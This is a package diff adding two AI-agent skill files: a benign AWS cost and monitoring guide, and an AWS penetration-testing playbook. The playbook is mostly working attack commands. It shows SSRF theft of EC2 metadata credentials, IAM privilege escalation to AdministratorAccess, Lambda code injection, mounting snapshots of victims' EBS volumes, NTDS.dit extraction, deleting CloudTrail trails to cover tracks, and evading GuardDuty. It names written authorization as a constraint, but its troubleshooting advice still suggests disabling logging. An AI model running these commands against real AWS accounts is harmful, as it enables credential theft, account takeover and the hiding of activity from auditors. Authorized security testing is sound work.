@ngxtm/devkit 3.7.0 → 3.8.0

package/merged-commands/aws-cost-operations.md

@@ -0,0 +1,317 @@
+---
+name: aws-cost-operations
+description: This skill provides AWS cost optimization, monitoring, and operational best practices with integrated MCP servers for billing analysis, cost estimation, observability, and security assessment.
+---
+
+# AWS Cost & Operations
+
+This skill provides comprehensive guidance for AWS cost optimization, monitoring, observability, and operational excellence with integrated MCP servers.
+
+## AWS Documentation Requirement
+
+**CRITICAL**: This skill requires AWS MCP tools for accurate, up-to-date AWS information.
+
+### Before Answering AWS Questions
+
+1. **Always verify** using AWS MCP tools (if available):
+   - `mcp__aws-mcp__aws___search_documentation` or `mcp__*awsdocs*__aws___search_documentation` - Search AWS docs
+   - `mcp__aws-mcp__aws___read_documentation` or `mcp__*awsdocs*__aws___read_documentation` - Read specific pages
+   - `mcp__aws-mcp__aws___get_regional_availability` - Check service availability
+
+2. **If AWS MCP tools are unavailable**:
+   - Guide user to configure AWS MCP: See [AWS MCP Setup Guide](../../docs/aws-mcp-setup.md)
+   - Help determine which option fits their environment:
+     - Has uvx + AWS credentials → Full AWS MCP Server
+     - No Python/credentials → AWS Documentation MCP (no auth)
+   - If cannot determine → Ask user which option to use
+
+## Integrated MCP Servers
+
+This skill includes 8 MCP servers automatically configured with the plugin:
+
+### Cost Management Servers
+
+#### 1. AWS Billing and Cost Management MCP Server
+**Purpose**: Real-time billing and cost management
+- View current AWS spending and trends
+- Analyze billing details across services
+- Track budget utilization
+- Monitor cost allocation tags
+- Review consolidated billing for organizations
+
+#### 2. AWS Pricing MCP Server
+**Purpose**: Pre-deployment cost estimation and optimization
+- Estimate costs before deploying resources
+- Compare pricing across regions
+- Calculate Total Cost of Ownership (TCO)
+- Evaluate different service options for cost efficiency
+- Get current pricing information for AWS services
+
+#### 3. AWS Cost Explorer MCP Server
+**Purpose**: Detailed cost analysis and reporting
+- Analyze historical spending patterns
+- Create custom cost reports
+- Identify cost anomalies and trends
+- Forecast future costs
+- Analyze cost by service, region, or tag
+- Generate cost optimization recommendations
+
+### Monitoring & Observability Servers
+
+#### 4. Amazon CloudWatch MCP Server
+**Purpose**: Metrics, alarms, and logs analysis
+- Query CloudWatch metrics and logs
+- Create and manage CloudWatch alarms
+- Analyze application performance metrics
+- Troubleshoot operational issues
+- Set up custom dashboards
+- Monitor resource utilization
+
+#### 5. Amazon CloudWatch Application Signals MCP Server
+**Purpose**: Application monitoring and performance insights
+- Monitor application health and performance
+- Analyze service-level objectives (SLOs)
+- Track application dependencies
+- Identify performance bottlenecks
+- Monitor service map and traces
+
+#### 6. AWS Managed Prometheus MCP Server
+**Purpose**: Prometheus-compatible monitoring
+- Query Prometheus metrics
+- Monitor containerized applications
+- Analyze Kubernetes workload metrics
+- Create PromQL queries
+- Track custom application metrics
+
+### Audit & Security Servers
+
+#### 7. AWS CloudTrail MCP Server
+**Purpose**: AWS API activity and audit analysis
+- Analyze AWS API calls and user activity
+- Track resource changes and modifications
+- Investigate security incidents
+- Audit compliance requirements
+- Identify unusual access patterns
+- Review who made what changes when
+
+#### 8. AWS Well-Architected Security Assessment Tool MCP Server
+**Purpose**: Security assessment against Well-Architected Framework
+- Assess security posture against AWS best practices
+- Identify security gaps and vulnerabilities
+- Get security improvement recommendations
+- Review security pillar compliance
+- Generate security assessment reports
+
+## When to Use This Skill
+
+Use this skill when:
+- Optimizing AWS costs and reducing spending
+- Estimating costs before deployment
+- Monitoring application and infrastructure performance
+- Setting up observability and alerting
+- Analyzing spending patterns and trends
+- Investigating operational issues
+- Auditing AWS activity and changes
+- Assessing security posture
+- Implementing operational excellence
+
+## Cost Optimization Best Practices
+
+### Pre-Deployment Cost Estimation
+
+**Always estimate costs before deploying**:
+1. Use **AWS Pricing MCP** to estimate resource costs
+2. Compare pricing across different regions
+3. Evaluate alternative service options
+4. Calculate expected monthly costs
+5. Plan for scaling and growth
+
+**Example workflow**:
+```
+"Estimate the monthly cost of running a Lambda function with
+1 million invocations, 512MB memory, 3-second duration in us-east-1"
+```
+
+### Cost Analysis and Optimization
+
+**Regular cost reviews**:
+1. Use **Cost Explorer MCP** to analyze spending trends
+2. Identify cost anomalies and unexpected charges
+3. Review costs by service, region, and environment
+4. Compare actual vs. budgeted costs
+5. Generate cost optimization recommendations
+
+**Cost optimization strategies**:
+- Right-size over-provisioned resources
+- Use appropriate storage classes (S3, EBS)
+- Implement auto-scaling for dynamic workloads
+- Leverage Savings Plans and Reserved Instances
+- Delete unused resources and snapshots
+- Use cost allocation tags effectively
+
+### Budget Monitoring
+
+**Track spending against budgets**:
+1. Use **Billing and Cost Management MCP** to monitor budgets
+2. Set up budget alerts for threshold breaches
+3. Review budget utilization regularly
+4. Adjust budgets based on trends
+5. Implement cost controls and governance
+
+## Monitoring and Observability Best Practices
+
+### CloudWatch Metrics and Alarms
+
+**Implement comprehensive monitoring**:
+1. Use **CloudWatch MCP** to query metrics and logs
+2. Set up alarms for critical metrics:
+   - CPU and memory utilization
+   - Error rates and latency
+   - Queue depths and processing times
+   - API gateway throttling
+   - Lambda errors and timeouts
+3. Create CloudWatch dashboards for visualization
+4. Use log insights for troubleshooting
+
+**Example alarm scenarios**:
+- Lambda error rate > 1%
+- EC2 CPU utilization > 80%
+- API Gateway 4xx/5xx error spike
+- DynamoDB throttled requests
+- ECS task failures
+
+### Application Performance Monitoring
+
+**Monitor application health**:
+1. Use **CloudWatch Application Signals MCP** for APM
+2. Track service-level objectives (SLOs)
+3. Monitor application dependencies
+4. Identify performance bottlenecks
+5. Set up distributed tracing
+
+### Container and Kubernetes Monitoring
+
+**For containerized workloads**:
+1. Use **AWS Managed Prometheus MCP** for metrics
+2. Monitor container resource utilization
+3. Track pod and node health
+4. Create PromQL queries for custom metrics
+5. Set up alerts for container anomalies
+
+## Audit and Security Best Practices
+
+### CloudTrail Activity Analysis
+
+**Audit AWS activity**:
+1. Use **CloudTrail MCP** to analyze API activity
+2. Track who made changes to resources
+3. Investigate security incidents
+4. Monitor for suspicious activity patterns
+5. Audit compliance with policies
+
+**Common audit scenarios**:
+- "Who deleted this S3 bucket?"
+- "Show all IAM role changes in the last 24 hours"
+- "List failed login attempts"
+- "Find all actions by a specific user"
+- "Track modifications to security groups"
+
+### Security Assessment
+
+**Regular security reviews**:
+1. Use **Well-Architected Security Assessment MCP**
+2. Assess security posture against best practices
+3. Identify security gaps and vulnerabilities
+4. Implement recommended security improvements
+5. Document security compliance
+
+**Security assessment areas**:
+- Identity and Access Management (IAM)
+- Detective controls and monitoring
+- Infrastructure protection
+- Data protection and encryption
+- Incident response preparedness
+
+## Using MCP Servers Effectively
+
+### Cost Analysis Workflow
+
+1. **Pre-deployment**: Use Pricing MCP to estimate costs
+2. **Post-deployment**: Use Billing MCP to track actual spending
+3. **Analysis**: Use Cost Explorer MCP for detailed cost analysis
+4. **Optimization**: Implement recommendations from Cost Explorer
+
+### Monitoring Workflow
+
+1. **Setup**: Configure CloudWatch metrics and alarms
+2. **Monitor**: Use CloudWatch MCP to track key metrics
+3. **Analyze**: Use Application Signals for APM insights
+4. **Troubleshoot**: Query CloudWatch Logs for issue resolution
+
+### Security Workflow
+
+1. **Audit**: Use CloudTrail MCP to review activity
+2. **Assess**: Use Well-Architected Security Assessment
+3. **Remediate**: Implement security recommendations
+4. **Monitor**: Track security events via CloudWatch
+
+### MCP Usage Best Practices
+
+1. **Cost Awareness**: Check pricing before deploying resources
+2. **Proactive Monitoring**: Set up alarms for critical metrics
+3. **Regular Reviews**: Analyze costs and performance weekly
+4. **Audit Trails**: Review CloudTrail logs for compliance
+5. **Security First**: Run security assessments regularly
+6. **Optimize Continuously**: Act on cost and performance recommendations
+
+## Operational Excellence Guidelines
+
+### Cost Optimization
+
+- **Tag Everything**: Use consistent cost allocation tags
+- **Review Monthly**: Analyze spending trends and anomalies
+- **Right-size**: Match resources to actual usage
+- **Automate**: Use auto-scaling and scheduling
+- **Monitor Budgets**: Set alerts for cost overruns
+
+### Monitoring and Alerting
+
+- **Critical Metrics**: Alert on business-critical metrics
+- **Noise Reduction**: Fine-tune thresholds to reduce false positives
+- **Actionable Alerts**: Ensure alerts have clear remediation steps
+- **Dashboard Visibility**: Create dashboards for key stakeholders
+- **Log Retention**: Balance cost and compliance needs
+
+### Security and Compliance
+
+- **Least Privilege**: Grant minimum required permissions
+- **Audit Regularly**: Review CloudTrail logs for anomalies
+- **Encrypt Data**: Use encryption at rest and in transit
+- **Assess Continuously**: Run security assessments frequently
+- **Incident Response**: Have procedures for security events
+
+## Additional Resources
+
+For detailed operational patterns and best practices, refer to the comprehensive reference:
+
+**File**: `references/operations-patterns.md`
+
+This reference includes:
+- Cost optimization strategies
+- Monitoring and alerting patterns
+- Observability best practices
+- Security and compliance guidelines
+- Troubleshooting workflows
+
+## CloudWatch Alarms Reference
+
+**File**: `references/cloudwatch-alarms.md`
+
+Common alarm configurations for:
+- Lambda functions
+- EC2 instances
+- RDS databases
+- DynamoDB tables
+- API Gateway
+- ECS services
+- Application Load Balancers

package/merged-commands/aws-penetration-testing.md

@@ -0,0 +1,405 @@
+---
+name: AWS Penetration Testing
+description: This skill should be used when the user asks to "pentest AWS", "test AWS security", "enumerate IAM", "exploit cloud infrastructure", "AWS privilege escalation", "S3 bucket testing", "metadata SSRF", "Lambda exploitation", or needs guidance on Amazon Web Services security assessment.
+metadata:
+  author: zebbern
+  version: "1.1"
+---
+
+# AWS Penetration Testing
+
+## Purpose
+
+Provide comprehensive techniques for penetration testing AWS cloud environments. Covers IAM enumeration, privilege escalation, SSRF to metadata endpoint, S3 bucket exploitation, Lambda code extraction, and persistence techniques for red team operations.
+
+## Inputs/Prerequisites
+
+- AWS CLI configured with credentials
+- Valid AWS credentials (even low-privilege)
+- Understanding of AWS IAM model
+- Python 3, boto3 library
+- Tools: Pacu, Prowler, ScoutSuite, SkyArk
+
+## Outputs/Deliverables
+
+- IAM privilege escalation paths
+- Extracted credentials and secrets
+- Compromised EC2/Lambda/S3 resources
+- Persistence mechanisms
+- Security audit findings
+
+---
+
+## Essential Tools
+
+| Tool | Purpose | Installation |
+|------|---------|--------------|
+| Pacu | AWS exploitation framework | `git clone https://github.com/RhinoSecurityLabs/pacu` |
+| SkyArk | Shadow Admin discovery | `Import-Module .\SkyArk.ps1` |
+| Prowler | Security auditing | `pip install prowler` |
+| ScoutSuite | Multi-cloud auditing | `pip install scoutsuite` |
+| enumerate-iam | Permission enumeration | `git clone https://github.com/andresriancho/enumerate-iam` |
+| Principal Mapper | IAM analysis | `pip install principalmapper` |
+
+---
+
+## Core Workflow
+
+### Step 1: Initial Enumeration
+
+Identify the compromised identity and permissions:
+
+```bash
+# Check current identity
+aws sts get-caller-identity
+
+# Configure profile
+aws configure --profile compromised
+
+# List access keys
+aws iam list-access-keys
+
+# Enumerate permissions
+./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
+```
+
+### Step 2: IAM Enumeration
+
+```bash
+# List all users
+aws iam list-users
+
+# List groups for user
+aws iam list-groups-for-user --user-name TARGET_USER
+
+# List attached policies
+aws iam list-attached-user-policies --user-name TARGET_USER
+
+# List inline policies
+aws iam list-user-policies --user-name TARGET_USER
+
+# Get policy details
+aws iam get-policy --policy-arn POLICY_ARN
+aws iam get-policy-version --policy-arn POLICY_ARN --version-id v1
+
+# List roles
+aws iam list-roles
+aws iam list-attached-role-policies --role-name ROLE_NAME
+```
+
+### Step 3: Metadata SSRF (EC2)
+
+Exploit SSRF to access metadata endpoint (IMDSv1):
+
+```bash
+# Access metadata endpoint
+http://169.254.169.254/latest/meta-data/
+
+# Get IAM role name
+http://169.254.169.254/latest/meta-data/iam/security-credentials/
+
+# Extract temporary credentials
+http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME
+
+# Response contains:
+{
+  "AccessKeyId": "ASIA...",
+  "SecretAccessKey": "...",
+  "Token": "...",
+  "Expiration": "2019-08-01T05:20:30Z"
+}
+```
+
+**For IMDSv2 (token required):**
+
+```bash
+# Get token first
+TOKEN=$(curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
+  "http://169.254.169.254/latest/api/token")
+
+# Use token for requests
+curl -H "X-aws-ec2-metadata-token:$TOKEN" \
+  "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
+```
+
+**Fargate Container Credentials:**
+
+```bash
+# Read environment for credential path
+/proc/self/environ
+# Look for: AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/...
+
+# Access credentials
+http://169.254.170.2/v2/credentials/CREDENTIAL-PATH
+```
+
+---
+
+## Privilege Escalation Techniques
+
+### Shadow Admin Permissions
+
+These permissions are equivalent to administrator:
+
+| Permission | Exploitation |
+|------------|--------------|
+| `iam:CreateAccessKey` | Create keys for admin user |
+| `iam:CreateLoginProfile` | Set password for any user |
+| `iam:AttachUserPolicy` | Attach admin policy to self |
+| `iam:PutUserPolicy` | Add inline admin policy |
+| `iam:AddUserToGroup` | Add self to admin group |
+| `iam:PassRole` + `ec2:RunInstances` | Launch EC2 with admin role |
+| `lambda:UpdateFunctionCode` | Inject code into Lambda |
+
+### Create Access Key for Another User
+
+```bash
+aws iam create-access-key --user-name target_user
+```
+
+### Attach Admin Policy
+
+```bash
+aws iam attach-user-policy --user-name my_username \
+  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
+```
+
+### Add Inline Admin Policy
+
+```bash
+aws iam put-user-policy --user-name my_username \
+  --policy-name admin_policy \
+  --policy-document file://admin-policy.json
+```
+
+### Lambda Privilege Escalation
+
+```python
+# code.py - Inject into Lambda function
+import boto3
+
+def lambda_handler(event, context):
+    client = boto3.client('iam')
+    response = client.attach_user_policy(
+        UserName='my_username',
+        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
+    )
+    return response
+```
+
+```bash
+# Update Lambda code
+aws lambda update-function-code --function-name target_function \
+  --zip-file fileb://malicious.zip
+```
+
+---
+
+## S3 Bucket Exploitation
+
+### Bucket Discovery
+
+```bash
+# Using bucket_finder
+./bucket_finder.rb wordlist.txt
+./bucket_finder.rb --download --region us-east-1 wordlist.txt
+
+# Common bucket URL patterns
+https://{bucket-name}.s3.amazonaws.com
+https://s3.amazonaws.com/{bucket-name}
+```
+
+### Bucket Enumeration
+
+```bash
+# List buckets (with creds)
+aws s3 ls
+
+# List bucket contents
+aws s3 ls s3://bucket-name --recursive
+
+# Download all files
+aws s3 sync s3://bucket-name ./local-folder
+```
+
+### Public Bucket Search
+
+```
+https://buckets.grayhatwarfare.com/
+```
+
+---
+
+## Lambda Exploitation
+
+```bash
+# List Lambda functions
+aws lambda list-functions
+
+# Get function code
+aws lambda get-function --function-name FUNCTION_NAME
+# Download URL provided in response
+
+# Invoke function
+aws lambda invoke --function-name FUNCTION_NAME output.txt
+```
+
+---
+
+## SSM Command Execution
+
+Systems Manager allows command execution on EC2 instances:
+
+```bash
+# List managed instances
+aws ssm describe-instance-information
+
+# Execute command
+aws ssm send-command --instance-ids "i-0123456789" \
+  --document-name "AWS-RunShellScript" \
+  --parameters commands="whoami"
+
+# Get command output
+aws ssm list-command-invocations --command-id "CMD-ID" \
+  --details --query "CommandInvocations[].CommandPlugins[].Output"
+```
+
+---
+
+## EC2 Exploitation
+
+### Mount EBS Volume
+
+```bash
+# Create snapshot of target volume
+aws ec2 create-snapshot --volume-id vol-xxx --description "Audit"
+
+# Create volume from snapshot
+aws ec2 create-volume --snapshot-id snap-xxx --availability-zone us-east-1a
+
+# Attach to attacker instance
+aws ec2 attach-volume --volume-id vol-xxx --instance-id i-xxx --device /dev/xvdf
+
+# Mount and access
+sudo mkdir /mnt/stolen
+sudo mount /dev/xvdf1 /mnt/stolen
+```
+
+### Shadow Copy Attack (Windows DC)
+
+```bash
+# CloudCopy technique
+# 1. Create snapshot of DC volume
+# 2. Share snapshot with attacker account
+# 3. Mount in attacker instance
+# 4. Extract NTDS.dit and SYSTEM
+secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local
+```
+
+---
+
+## Console Access from API Keys
+
+Convert CLI credentials to console access:
+
+```bash
+git clone https://github.com/NetSPI/aws_consoler
+aws_consoler -v -a AKIAXXXXXXXX -s SECRETKEY
+
+# Generates signin URL for console access
+```
+
+---
+
+## Covering Tracks
+
+### Disable CloudTrail
+
+```bash
+# Delete trail
+aws cloudtrail delete-trail --name trail_name
+
+# Disable global events
+aws cloudtrail update-trail --name trail_name \
+  --no-include-global-service-events
+
+# Disable specific region
+aws cloudtrail update-trail --name trail_name \
+  --no-include-global-service-events --no-is-multi-region-trail
+```
+
+**Note:** Kali/Parrot/Pentoo Linux triggers GuardDuty alerts based on user-agent. Use Pacu which modifies the user-agent.
+
+---
+
+## Quick Reference
+
+| Task | Command |
+|------|---------|
+| Get identity | `aws sts get-caller-identity` |
+| List users | `aws iam list-users` |
+| List roles | `aws iam list-roles` |
+| List buckets | `aws s3 ls` |
+| List EC2 | `aws ec2 describe-instances` |
+| List Lambda | `aws lambda list-functions` |
+| Get metadata | `curl http://169.254.169.254/latest/meta-data/` |
+
+---
+
+## Constraints
+
+**Must:**
+- Obtain written authorization before testing
+- Document all actions for audit trail
+- Test in scope resources only
+
+**Must Not:**
+- Modify production data without approval
+- Leave persistent backdoors without documentation
+- Disable security controls permanently
+
+**Should:**
+- Check for IMDSv2 before attempting metadata attacks
+- Enumerate thoroughly before exploitation
+- Clean up test resources after engagement
+
+---
+
+## Examples
+
+### Example 1: SSRF to Admin
+
+```bash
+# 1. Find SSRF vulnerability in web app
+https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
+
+# 2. Get role name from response
+# 3. Extract credentials
+https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/AdminRole
+
+# 4. Configure AWS CLI with stolen creds
+export AWS_ACCESS_KEY_ID=ASIA...
+export AWS_SECRET_ACCESS_KEY=...
+export AWS_SESSION_TOKEN=...
+
+# 5. Verify access
+aws sts get-caller-identity
+```
+
+---
+
+## Troubleshooting
+
+| Issue | Solution |
+|-------|----------|
+| Access Denied on all commands | Enumerate permissions with enumerate-iam |
+| Metadata endpoint blocked | Check for IMDSv2, try container metadata |
+| GuardDuty alerts | Use Pacu with custom user-agent |
+| Expired credentials | Re-fetch from metadata (temp creds rotate) |
+| CloudTrail logging actions | Consider disable or log obfuscation |
+
+---
+
+## Additional Resources
+
+For advanced techniques including Lambda/API Gateway exploitation, Secrets Manager & KMS, Container security (ECS/EKS/ECR), RDS/DynamoDB exploitation, VPC lateral movement, and security checklists, see [references/advanced-aws-pentesting.md](references/advanced-aws-pentesting.md).